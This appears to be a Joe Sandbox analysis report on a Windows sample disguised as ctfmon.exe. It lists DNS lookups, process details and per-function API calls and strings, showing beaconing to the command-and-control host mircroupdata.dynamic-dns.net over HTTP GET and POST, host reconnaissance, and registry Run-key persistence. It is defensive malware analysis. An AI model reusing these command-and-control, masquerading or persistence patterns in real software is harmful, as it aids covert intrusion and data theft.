Dec 27, 2024 14:12:58.344664097 CET	1.1.1.1	192.168.2.6	0x5658	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 27, 2024 14:12:58.344664097 CET	1.1.1.1	192.168.2.6	0x5658	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false
Dec 27, 2024 14:13:03.997077942 CET	1.1.1.1	192.168.2.6	0x1aed	No error (0)	mircroupdata.dynamic-dns.net		127.0.0.1	A (IP address)	IN (0x0001)	false
Dec 27, 2024 14:13:03.997112036 CET	1.1.1.1	192.168.2.6	0x1aed	No error (0)	mircroupdata.dynamic-dns.net		127.0.0.1	A (IP address)	IN (0x0001)	false
Dec 27, 2024 14:13:35.218943119 CET	1.1.1.1	192.168.2.6	0x26dc	No error (0)	mircroupdata.dynamic-dns.net		127.0.0.1	A (IP address)	IN (0x0001)	false
Dec 27, 2024 14:13:35.218956947 CET	1.1.1.1	192.168.2.6	0x26dc	No error (0)	mircroupdata.dynamic-dns.net		127.0.0.1	A (IP address)	IN (0x0001)	false
Dec 27, 2024 14:14:07.058629990 CET	1.1.1.1	192.168.2.6	0xd85e	No error (0)	mircroupdata.dynamic-dns.net		127.0.0.1	A (IP address)	IN (0x0001)	false
Dec 27, 2024 14:14:07.058650970 CET	1.1.1.1	192.168.2.6	0xd85e	No error (0)	mircroupdata.dynamic-dns.net		127.0.0.1	A (IP address)	IN (0x0001)	false
Dec 27, 2024 14:14:39.127676964 CET	1.1.1.1	192.168.2.6	0x1008	No error (0)	mircroupdata.dynamic-dns.net		127.0.0.1	A (IP address)	IN (0x0001)	false
Dec 27, 2024 14:14:39.127697945 CET	1.1.1.1	192.168.2.6	0x1008	No error (0)	mircroupdata.dynamic-dns.net		127.0.0.1	A (IP address)	IN (0x0001)	false
Dec 27, 2024 14:15:12.032366037 CET	1.1.1.1	192.168.2.6	0x305b	No error (0)	mircroupdata.dynamic-dns.net		127.0.0.1	A (IP address)	IN (0x0001)	false
Dec 27, 2024 14:15:12.032439947 CET	1.1.1.1	192.168.2.6	0x305b	No error (0)	mircroupdata.dynamic-dns.net		127.0.0.1	A (IP address)	IN (0x0001)	false
Dec 27, 2024 14:15:43.902530909 CET	1.1.1.1	192.168.2.6	0xb5ad	No error (0)	mircroupdata.dynamic-dns.net		127.0.0.1	A (IP address)	IN (0x0001)	false
Dec 27, 2024 14:15:43.902556896 CET	1.1.1.1	192.168.2.6	0xb5ad	No error (0)	mircroupdata.dynamic-dns.net		127.0.0.1	A (IP address)	IN (0x0001)	false
Dec 27, 2024 14:16:15.416356087 CET	1.1.1.1	192.168.2.6	0xfc38	No error (0)	mircroupdata.dynamic-dns.net		127.0.0.1	A (IP address)	IN (0x0001)	false
Dec 27, 2024 14:16:15.416402102 CET	1.1.1.1	192.168.2.6	0xfc38	No error (0)	mircroupdata.dynamic-dns.net		127.0.0.1	A (IP address)	IN (0x0001)	false
Dec 27, 2024 14:16:46.155421972 CET	1.1.1.1	192.168.2.6	0xe938	No error (0)	mircroupdata.dynamic-dns.net		127.0.0.1	A (IP address)	IN (0x0001)	false
Dec 27, 2024 14:16:46.155436993 CET	1.1.1.1	192.168.2.6	0xe938	No error (0)	mircroupdata.dynamic-dns.net		127.0.0.1	A (IP address)	IN (0x0001)	false

Target ID:	0
Start time:	08:13:00
Start date:	27/12/2024
Path:	C:\Users\user\Desktop\ctfmon.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\ctfmon.exe"
Imagebase:	0x400000
File size:	252'928 bytes
MD5 hash:	E93FC4C159D07F6BFC246C10E6149EF8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	08:13:16
Start date:	27/12/2024
Path:	C:\Users\user\Desktop\ctfmon.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\ctfmon.exe"
Imagebase:	0x400000
File size:	252'928 bytes
MD5 hash:	E93FC4C159D07F6BFC246C10E6149EF8
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	6.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	11.4%
Total number of Nodes:	2000
Total number of Limit Nodes:	43

Executed Functions

Function 004014B0 Relevance: 247.4, APIs: 41, Strings: 100, Instructions: 635
networkmemorysleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,00080000,00001000,00000004), ref: 0040150F
WSAStartup.WS2_32(00000202,?), ref: 00401522
LoadLibraryW.KERNEL32(Kernel32.dll), ref: 0040152D
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0040153F
FreeLibrary.KERNEL32(00000000), ref: 0040154B
VirtualAlloc.KERNEL32(00000000,000186A0,00001000,00000004), ref: 00401C17
VirtualAlloc.KERNEL32(00000000,000186A0,00001000,00000004), ref: 00401C2B
VirtualAlloc.KERNEL32(00000000,000186A0,00001000,00000004), ref: 00401C3F
VirtualAlloc.KERNEL32(00000000,000186A0,00001000,00000004), ref: 00401C53
VirtualAlloc.KERNEL32(00000000,000186A0,00001000,00000004), ref: 00401C67
VirtualAlloc.KERNEL32(00000000,000186A0,00001000,00000004), ref: 00401C7B
CreateEventW.KERNEL32(00000000,00000001,00000000,fsdf++_[)**huahj6po1klHGH), ref: 00401C97
SetEvent.KERNEL32(00000000), ref: 00401C9F
CreateEventW.KERNEL32(00000000,00000001,00000001,fsdf++_[)**huahj6po1klHGHSENDDATAPARA), ref: 00401CAF
CreateEventW.KERNEL32(00000000,00000001,00000000,fsdf++_[)**huahj6po1klHGHSENDDATAPARAdatahassend), ref: 00401CBF
CreateEventW.KERNEL32(00000000,00000001,00000000,fsdf++_[)**huahj6po1klHGHSENDDATAPARAIsSendGet), ref: 00401CCF
CreateEventW.KERNEL32(00000000,00000001,00000001,fsdf++_[)**huahj6po1klHGHSENDDATAPARAIsSendPost), ref: 00401CE0
CreateEventW.KERNEL32(00000000,00000000,00000000,fsdf++_[)**huahj6po1klHGHSENDDATAPARA0001), ref: 00401CEF
CreateEventW.KERNEL32(00000000,00000000,00000000,fsdf++_[)**huahj6po1klHGHSENDDATAPARA0002), ref: 00401CFE

Part of subcall function 00405040: GetCommandLineW.KERNEL32(76232F60), ref: 00405068

Part of subcall function 00403190: GetComputerNameW.KERNEL32(?), ref: 00403223
Part of subcall function 00403190: gethostname.WS2_32(?,00000100), ref: 0040325F
Part of subcall function 00403190: gethostbyname.WS2_32(?), ref: 0040326D

Part of subcall function 00403D20: GetLogicalDrives.KERNEL32 ref: 00403D25
Part of subcall function 00403D20: GetDriveTypeA.KERNEL32(?), ref: 00403D7E

CreateThread.KERNEL32(00000000,00000000,Function_00003C80,00000000,00000000,00000000), ref: 00401D64
CreateThread.KERNEL32(00000000,00000000,Function_00004150,00000000,00000000,00000000), ref: 00401D70
CreateThread.KERNEL32(00000000,00000000,Function_00001130,00000000,00000000,00000000), ref: 00401D7C
CreateThread.KERNEL32 ref: 00401D99
InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1),00000000,00000000,00000000,00000000), ref: 00401DB7
Sleep.KERNEL32(00001388), ref: 00401DC8
InternetConnectA.WININET(00000000,mircroupdata.dynamic-dns.net,00000050,00000000,00000000,00000003,00000000,00000001), ref: 00401DE2
InternetCloseHandle.WININET(00000000), ref: 00401DEF
Sleep.KERNEL32(00001388), ref: 00401DF6
HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,84400100,00000002), ref: 00401E19
InternetCloseHandle.WININET(00000000), ref: 00401E26
InternetCloseHandle.WININET(00000000), ref: 00401E29
Sleep.KERNEL32(00001388), ref: 00401E30
InternetSetOptionA.WININET(00000000,00000005,?,00000004), ref: 00401E48
Sleep.KERNEL32(0000000A), ref: 00401E69
WaitForSingleObject.KERNEL32(00000354,000000FF), ref: 00401E78
ResetEvent.KERNEL32(00000350), ref: 00401E85
HttpAddRequestHeadersA.WININET(00000000,?,?,A0000000), ref: 00401F0E
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00401F1D
InternetReadFile.WININET(00000000,?,00080000,?), ref: 00401F45
GetLastError.KERNEL32(?,A0000000,?,?,?,?,00000000,00000000,Function_00002BA0,00000000,00000000,00000000), ref: 00401F5E
SetEvent.KERNEL32(00000350,?,A0000000,?,?,?,?,00000000,00000000,Function_00002BA0,00000000,00000000,00000000), ref: 00401F6B

Strings

+, xrefs: 004016A4
fsdf++_[)**huahj6po1klHGHSENDDATAPARA0002, xrefs: 00401CF1
L, xrefs: 00401692
a, xrefs: 00401A5F
Kernel32.dll, xrefs: 00401528
P, xrefs: 00401707
h, xrefs: 00401A96
a, xrefs: 00401587
h, xrefs: 00401A47
\, xrefs: 00401761
R, xrefs: 0040191C
Q, xrefs: 004015D1
B, xrefs: 00401ACC
L, xrefs: 00401650
@, xrefs: 004018A9
], xrefs: 00401889
P, xrefs: 004015D6
P, xrefs: 00401749
', xrefs: 004019EA
H, xrefs: 004018DD
X, xrefs: 0040157D
, xrefs: 0040160C
L, xrefs: 00401A7F
Q, xrefs: 00401BF2
|, xrefs: 00401603
675052, xrefs: 00401D0F
X, xrefs: 00401BBD
R, xrefs: 004015EA
Q, xrefs: 00401ABD
L, xrefs: 00401716
T, xrefs: 00401B1B
N, xrefs: 00401777
R, xrefs: 00401B59
L, xrefs: 004017CD
fsdf++_[)**huahj6po1klHGHSENDDATAPARAIsSendPost, xrefs: 00401CD1
`, xrefs: 004017DC
Y, xrefs: 00401871
PTPM, xrefs: 00401F7D
:, xrefs: 0040176F
4, xrefs: 0040169B
fsdf++_[)**huahj6po1klHGHSENDDATAPARA, xrefs: 00401CA5
p, xrefs: 00401A12
\, xrefs: 004018CE
_, xrefs: 00401879
T, xrefs: 00401905
H, xrefs: 00401831
t, xrefs: 00401A1A
j, xrefs: 0040156E
_, xrefs: 0040177F
L, xrefs: 00401822
`, xrefs: 00401BE2
B, xrefs: 00401620
@, xrefs: 00401B2A
d, xrefs: 004019C2
`, xrefs: 00401AAD
P, xrefs: 00401683
a, xrefs: 004019CA
O, xrefs: 004017BD
+, xrefs: 00401A9E
9, xrefs: 00401662
j, xrefs: 004018ED
fsdf++_[)**huahj6po1klHGHSENDDATAPARAIsSendGet, xrefs: 00401CC1
#, xrefs: 00401B51
mircroupdata.dynamic-dns.net, xrefs: 00401DDC
GET, xrefs: 00401E13
X, xrefs: 00401A3F
k, xrefs: 00401B96
fsdf++_[)**huahj6po1klHGH, xrefs: 00401C83
L, xrefs: 00401758
Referer: %02x%02x%02x%02x%02x%02x%02x%02x=+, xrefs: 00401EDE
X, xrefs: 0040171F
P, xrefs: 0040192C
^, xrefs: 00401881
P, xrefs: 00401641
GetNativeSystemInfo, xrefs: 00401539
h, xrefs: 00401B32
H, xrefs: 00401914
H, xrefs: 004015C7
L, xrefs: 00401BD3
|, xrefs: 00401963
item.asp?spm=xx{}:>*()_!, xrefs: 004014BF
d, xrefs: 00401839
P, xrefs: 00401BEA
t, xrefs: 004019F2
[, xrefs: 00401891
V, xrefs: 00401934
L, xrefs: 004016D4
h, xrefs: 00401578
5, xrefs: 0040162A
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1), xrefs: 00401DB0
#, xrefs: 004019FA
3, xrefs: 0040180B
*, xrefs: 00401B3A
P, xrefs: 004016C5
fsdf++_[)**huahj6po1klHGHSENDDATAPARA0001, xrefs: 00401CE2
d, xrefs: 00401972
P, xrefs: 0040179D
Q, xrefs: 00401924
fsdf++_[)**huahj6po1klHGHSENDDATAPARAdatahassend, xrefs: 00401CB1
P, xrefs: 00401A6F

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: Create$Event$AllocInternetVirtual$SleepThread$CloseHandleHttpRequest$LibraryOpen$AddressCommandComputerConnectDriveDrivesErrorFileFreeHeadersLastLineLoadLogicalNameObjectOptionProcReadResetSendSingleStartupTypeWaitgethostbynamegethostname
String ID: $#$#$'$*$+$+$3$4$5$675052$9$:$@$@$B$B$GET$GetNativeSystemInfo$H$H$H$H$Kernel32.dll$L$L$L$L$L$L$L$L$L$Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)$N$O$P$P$P$P$P$P$P$P$P$P$PTPM$Q$Q$Q$Q$R$R$R$Referer: %02x%02x%02x%02x%02x%02x%02x%02x=+$T$T$V$X$X$X$X$Y$[$\$\$]$^$_$_$`$`$`$a$a$a$d$d$d$fsdf++_[)**huahj6po1klHGH$fsdf++_[)**huahj6po1klHGHSENDDATAPARA$fsdf++_[)**huahj6po1klHGHSENDDATAPARA0001$fsdf++_[)**huahj6po1klHGHSENDDATAPARA0002$fsdf++_[)**huahj6po1klHGHSENDDATAPARAIsSendGet$fsdf++_[)**huahj6po1klHGHSENDDATAPARAIsSendPost$fsdf++_[)**huahj6po1klHGHSENDDATAPARAdatahassend$h$h$h$h$item.asp?spm=xx{}:>*()_!$j$j$k$mircroupdata.dynamic-dns.net$p$t$t$|$|
API String ID: 532994470-3063579737
Opcode ID: 7ab0d9eef510a3772e120244943042c5d8440bc05c794fce203168c27190420c
Instruction ID: bf1a022c60407e02be0dd9bd1b531f7c38c72e15a62a5c9b7b3f82dbccb0f244
Opcode Fuzzy Hash: 7ab0d9eef510a3772e120244943042c5d8440bc05c794fce203168c27190420c
Instruction Fuzzy Hash: 7D62482010C7C5D9E332C7788849B8FBED55BA7324F484A9DF1E86B2D2C6B95109C76B

Function 00403190 Relevance: 44.0, APIs: 8, Strings: 17, Instructions: 276
networktimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetComputerNameW.KERNEL32(?), ref: 00403223
gethostname.WS2_32(?,00000100), ref: 0040325F
gethostbyname.WS2_32(?), ref: 0040326D
timeGetTime.WINMM ref: 004032FD
GetVersionExW.KERNEL32(?), ref: 00403393
GetVersionExW.KERNEL32(0000011C), ref: 004033A6

Strings

Windows Home Server, xrefs: 00403485
Windows Vista, xrefs: 00403432
Windows XP, xrefs: 004034C3
Windows 7, xrefs: 00403405
Windows 8, xrefs: 004033D7
Windows Server 2008 R2, xrefs: 0040340F
Windows 2000, xrefs: 004034D4
<`/#v, xrefs: 004031C5
Windows Server 2003 R2, xrefs: 0040346C
Windows Server 2003, xrefs: 0040349A
<, xrefs: 00403229
Windows Server 2008, xrefs: 0040343C
Windows Server 2012, xrefs: 004033E1
SP%d, xrefs: 00403508
%3dD:%2dH:%2dM, xrefs: 00403346
%d.%d.%d.%d, xrefs: 004032B3
Windows XP Professional x64, xrefs: 004034B1

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: Version$ComputerNameTimegethostbynamegethostnametime
String ID: SP%d$%3dD:%2dH:%2dM$%d.%d.%d.%d$<$<`/#v$Windows 2000$Windows 7$Windows 8$Windows Home Server$Windows Server 2003$Windows Server 2003 R2$Windows Server 2008$Windows Server 2008 R2$Windows Server 2012$Windows Vista$Windows XP$Windows XP Professional x64
API String ID: 855337075-699715364
Opcode ID: 2f141a5107b3ccbad37aa88038b1529af5405a533d7e69f40edc7eec3bde9742
Instruction ID: bdf93ca89eb0b6f63a75df1cd038082309c9780f61bd84f6bf5dbb40301ebfc2
Opcode Fuzzy Hash: 2f141a5107b3ccbad37aa88038b1529af5405a533d7e69f40edc7eec3bde9742
Instruction Fuzzy Hash: E4A1C731608345ABC724CE24C8406AFBBE6AFC5310F544A3EF549DB3D0DB78DA49875A

Function 0042131A Relevance: 13.6, APIs: 9, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 0042131F
FindResourceW.KERNEL32(?,00000000,00000005,?,?,?,?,?,?,?,?,00000000), ref: 00421357
LoadResource.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 0042135F

Part of subcall function 004220E2: UnhookWindowsHookEx.USER32(?), ref: 00422107

LockResource.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 0042136C
IsWindowEnabled.USER32(?), ref: 0042139F
EnableWindow.USER32(?,00000000), ref: 004213AD
EnableWindow.USER32(?,00000001), ref: 0042143B
GetActiveWindow.USER32 ref: 00421446
SetActiveWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00421454

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: Window$Resource$ActiveEnable$EnabledFindH_prologHookLoadLockUnhookWindows
String ID:
API String ID: 401145483-0
Opcode ID: ee2693152e6010e6e9c47a675b8d66676a5692f735b3e3edcbf4436643e90683
Instruction ID: 784f444dc76e6990419508fd16e063a3552bb93fd24097b854aee613197a0977
Opcode Fuzzy Hash: ee2693152e6010e6e9c47a675b8d66676a5692f735b3e3edcbf4436643e90683
Instruction Fuzzy Hash: 9B41C030B00A24DBDB21AB65E885A7FB7B5FF54705F90011BF902A22A1CB798941CA69

Function 00422975 Relevance: 3.4, APIs: 2, Instructions: 422COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0042297A
GetVersion.KERNEL32(00000007,?,?,00000000,00000000,?,0000C000,00000000,00000000,00000007), ref: 00422B2D

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: H_prologVersion
String ID:
API String ID: 1836448879-0
Opcode ID: 27f1f03a74d78de30f97ea9d1cf75bd2c7dd32f017002826f89400c0ae325eed
Instruction ID: 097fcd5e74c8d1fde8cafafb4e683d868b573153c364305f64f98f5cddaff1ce
Opcode Fuzzy Hash: 27f1f03a74d78de30f97ea9d1cf75bd2c7dd32f017002826f89400c0ae325eed
Instruction Fuzzy Hash: 85E1A170700229FBDB14DF15EE80ABE77A9AF04314F90451AF816EB251CBBCD912E769

Function 00403550 Relevance: 3.1, APIs: 2, Instructions: 61COMMON

Download Yara Rule

APIs

GetAdaptersInfo.IPHLPAPI ref: 00403563
GetAdaptersInfo.IPHLPAPI(00000000,?), ref: 00403586

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: AdaptersInfo
String ID:
API String ID: 3177971545-0
Opcode ID: 6bbeaa26c9763f4250eb1d384f51f38419e531e379e69b77f3a02d484a0ccf89
Instruction ID: 6b7a8a9e45624f5e4ac54a2b774ff4b4d77386f4916c747b8fc9f6bd6b467c43
Opcode Fuzzy Hash: 6bbeaa26c9763f4250eb1d384f51f38419e531e379e69b77f3a02d484a0ccf89
Instruction Fuzzy Hash: F911C6B16003046BDB14EE629CC196B77DCEBC4715F04493EF9099B286EB39ED098766

Function 00402BA0 Relevance: 52.8, APIs: 23, Strings: 7, Instructions: 275
networksleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1),00000000,00000000,00000000,00000000), ref: 00402C18
Sleep.KERNEL32(00001388), ref: 00402C2C
InternetConnectA.WININET(00000000,mircroupdata.dynamic-dns.net,00000050,00000000,00000000,00000003,00000000,00000003), ref: 00402C42
InternetCloseHandle.WININET(00CC0008), ref: 00402C53
Sleep.KERNEL32(00001388), ref: 00402C5A
HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,00000000,84400100,00000004), ref: 00402C76
InternetCloseHandle.WININET(00CC0010), ref: 00402C88
InternetCloseHandle.WININET(00CC0008), ref: 00402C90
Sleep.KERNEL32(00001388), ref: 00402C97
InternetSetOptionA.WININET(00000000,00000005,0000000A,00000004), ref: 00402CA8
ResetEvent.KERNEL32(0000034C), ref: 00402CB5
WaitForSingleObject.KERNEL32(0000034C,000000FF), ref: 00402CCF
WaitForSingleObject.KERNEL32(00000350,000000FF), ref: 00402CDA
ResetEvent.KERNEL32(00000354), ref: 00402CE3
SetEvent.KERNEL32(00000348,?,A0000000,?,?,A0000000), ref: 00402CFB
SetEvent.KERNEL32(00000348), ref: 00402D13
HttpAddRequestHeadersA.WININET(00CC0014,?,?,A0000000), ref: 00402D9A
HttpAddRequestHeadersA.WININET(00CC0014,?,?,A0000000), ref: 00402E95
HttpSendRequestA.WININET(00CC0014,00000000,00000000,004BC7C4,00000000), ref: 00402EAE
InternetReadFile.WININET(00CC0014,0043C7C4,000186A0,?), ref: 00402ED4
GetLastError.KERNEL32(?,A0000000,?,?,A0000000), ref: 00402EEA
SetEvent.KERNEL32(00000354,?,A0000000,?,?,A0000000), ref: 00402F05
ResetEvent.KERNEL32(0000034C,?,A0000000,?,?,A0000000), ref: 00402F12

Strings

item.asp?spm=xx{}:>*()_!, xrefs: 00402BAF
POST, xrefs: 00402C70
mircroupdata.dynamic-dns.net, xrefs: 00402C3C
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1), xrefs: 00402C13
Content-Length: %u, xrefs: 00402E66
Referer: %02x%02x%02x%02x%02x%02x%02x%02x=+, xrefs: 00402D64
PTPM, xrefs: 00402DA1

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: Internet$Event$HttpRequest$CloseHandleResetSleep$HeadersObjectOpenSingleWait$ConnectErrorFileLastOptionReadSend
String ID: Content-Length: %u$Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)$POST$PTPM$Referer: %02x%02x%02x%02x%02x%02x%02x%02x=+$item.asp?spm=xx{}:>*()_!$mircroupdata.dynamic-dns.net
API String ID: 3227742456-1989333268
Opcode ID: 6b158de987f37018d3f3aedb66c614430a0e078141529bb07d86292ec45833a3
Instruction ID: 5521d0e7914338b547ae66bed9a7008d46125a5347177c733f9cd849099ed627
Opcode Fuzzy Hash: 6b158de987f37018d3f3aedb66c614430a0e078141529bb07d86292ec45833a3
Instruction Fuzzy Hash: 3291E672740302ABD714DB64EC85F2B3BA9EB98B00F50452DF905B73D1DBB8E8059B69

Function 00404620 Relevance: 43.9, APIs: 8, Strings: 17, Instructions: 189
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCommandLineA.KERNEL32 ref: 0040468A

Part of subcall function 004248AD: lstrlenA.KERNEL32(004058A3,?,?,?,004058A3,?), ref: 004248BB

WideCharToMultiByte.KERNEL32(00000000,00000000,76945540,?,?,00000104,00000000,00000000,00000022,00000000), ref: 004046C0
RegOpenKeyExA.KERNEL32(80000001,0000001D,00000000,000F003F,?), ref: 004047D1
GetLastError.KERNEL32 ref: 004047D9
RegQueryValueExA.KERNEL32(0000001D,ctfmon.exe,00000000,00000000,00000000,00000104), ref: 00404811
RegCloseKey.ADVAPI32(?), ref: 00404825
RegSetValueExA.KERNEL32(?,ctfmon.exe,00000000,00000001,?,0000001C), ref: 00404893
RegCloseKey.KERNEL32(?), ref: 0040489E

Strings

+, xrefs: 0040475F
ctfmon.exe, xrefs: 0040480B, 0040488D
', xrefs: 0040472D
', xrefs: 00404788
;, xrefs: 0040479A
(, xrefs: 0040471F
=, xrefs: 00404716
*, xrefs: 00404736
;, xrefs: 00404752
:, xrefs: 00404724
', xrefs: 00404704
=, xrefs: 00404783
=, xrefs: 00404744
:, xrefs: 00404768
-, xrefs: 00404709
+, xrefs: 0040477A
9, xrefs: 0040473F

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: CloseValue$ByteCharCommandErrorLastLineMultiOpenQueryWidelstrlen
String ID: '$'$'$($*$+$+$-$9$:$:$;$;$=$=$=$ctfmon.exe
API String ID: 3300019627-3918993357
Opcode ID: 037b884ea22887e435eb3aae53bc3090eac85484e3f03d1bbe25e0e0285c6335
Instruction ID: aab2ec02df40a054bcdff1db174f22e23601e58f66f7115433a06adc50c1c808
Opcode Fuzzy Hash: 037b884ea22887e435eb3aae53bc3090eac85484e3f03d1bbe25e0e0285c6335
Instruction Fuzzy Hash: 9D814B7120D3C0DED322CB689888B9FBFD4ABE6308F48495DF1D557282C6B99509C767

Function 00404150 Relevance: 35.3, APIs: 17, Strings: 3, Instructions: 324
sleepfilememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,0007A120,00001000,00000004), ref: 0040416F
